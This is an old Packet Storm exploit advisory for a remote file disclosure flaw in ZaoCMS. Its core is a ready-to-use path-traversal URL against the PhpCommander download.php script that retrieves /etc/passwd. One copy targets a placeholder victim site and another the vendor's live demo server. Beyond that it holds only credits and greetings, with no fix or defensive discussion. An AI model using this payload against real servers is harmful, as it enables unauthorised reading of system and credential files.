ZaoCMS File Disclosure

2009-05-22T00:00:00
ID PACKETSTORM:77730
Type packetstorm
Reporter ThE g0bL!N
Modified 2009-05-22T00:00:00

Description

                                        
                                            `--------------------------------------------------------------  
ZaoCMS Remote File Disclosure Vulnerability  
---------------------------------------------------------------  
Founder :ThE g0bL!N  
Home:http://www.zaocms.com/  
Software : ZaoCMS  
Note: The OperatIon Worked By Deleting Your Cookies From The Vuln 1  
---------------------------------------------------------------  
Exploit:  
---------  
http://wwww.victim.co.il/admin/functions/PhpCommander/download.php?fichier=passwd&Directory=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F  
demo:  
-------  
http://demo.zaocms.com/admin/functions/PhpCommander/download.php?fichier=passwd&Directory=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F  
-----------------------------------------------------------------------------------------------------  
His0k4 - Dr-HTmL , Dos-Dz TeaM , Kondamne , Snakes TeaM ArAb Academy Security Team,And Ev!L-C0d3r.  
-----------------------------------------------------------------------------------------------------  
  
  
`